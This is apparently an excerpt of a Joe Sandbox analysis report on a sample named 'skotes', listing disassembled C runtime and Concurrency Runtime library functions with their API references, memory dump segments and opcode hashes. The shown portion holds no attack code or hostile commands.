Part of subcall function 00C09C41: std::bad_exception::bad_exception.LIBCMT ref: 00C09C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00C0474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C047A4

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: 08eab51f72c5ab86d854d305bf2dcd17d22c0b901d4f8f21266a8f4d472dbcba
Instruction ID: 71d02cc28aa34a345adaa6016d93ea6729b03cbd134eeda6cd36fe8d2ab53c77
Opcode Fuzzy Hash: 08eab51f72c5ab86d854d305bf2dcd17d22c0b901d4f8f21266a8f4d472dbcba
Instruction Fuzzy Hash: E88160B0A11B66BBD708DF78C445BDAFAA8BF09700F10431AF528D7281DBB4A564DBD1

Function 00BFECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BFECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BFED17

Part of subcall function 00BFF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00BFF3FA

__alloca_probe_16.LIBCMT ref: 00BFED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00BFED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BFEDC6
__freea.LIBCMT ref: 00BFEDEC

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: af397e1ae36dc63760e34cc53d06fce0554d3ff8ac5af839f212383dc16a8fcb
Instruction ID: 6d36f036fec9afbf9e833e523bc57af967ff9b9564de0525a5cd2d520afc3d20
Opcode Fuzzy Hash: af397e1ae36dc63760e34cc53d06fce0554d3ff8ac5af839f212383dc16a8fcb
Instruction Fuzzy Hash: 3B318E75A001098BCB14DFA8C8415BDB7F5EF09310B2440B9EA65E7360DB34DE0A8BA1

Function 00BFEE5F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00BFEEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00BFEEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BFEEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BFEF0F
Concurrency::Context::Block.LIBCONCRT ref: 00BFEF31

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 73f1c625ef5315b51b6659b13b212454d8b25c8dd327fcb64370e251e724cbd2
Instruction ID: b6bb08daf9b062f2c5dde4471f23941a5f129d9205c22ed7a9282130b842f1b8
Opcode Fuzzy Hash: 73f1c625ef5315b51b6659b13b212454d8b25c8dd327fcb64370e251e724cbd2
Instruction Fuzzy Hash: B5212D7081421D8EEF25DFA4C8456FEB7F1EF15320F2005A9E261A71E1E7B19A48CA51

Function 00C11B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00C11B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C11B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C11C2A

Strings

pContext, xrefs: 00C11C22
switchState, xrefs: 00C11B5E

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: 86e15fa51e374486323d1a4c723d6565d8d04c5f273e1b2eca4567b031ba2287
Instruction ID: ab5209c9808a45e1439e26162f3fd31f5b7b5c7400f65b9e81282971daf8e718
Opcode Fuzzy Hash: 86e15fa51e374486323d1a4c723d6565d8d04c5f273e1b2eca4567b031ba2287
Instruction Fuzzy Hash: 6331E575A002149BCF04EF64C891AEDB3B5EF46320F284565EE2197281EB38EE45EBD0

Function 00C14E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00C14E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00C14E86
PMDtoOffset.LIBCMT ref: 00C14EAC

Strings

Bad dynamic_cast!, xrefs: 00C14EEE

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: db1731f522d045e67789d50a3b171b1029e2716393ffca6ab79cd21c91379e62
Instruction ID: 10786cdd3e10bb18108b29067f62470a7b0e00399d3df42f4961b14c3ef5b86e
Opcode Fuzzy Hash: db1731f522d045e67789d50a3b171b1029e2716393ffca6ab79cd21c91379e62
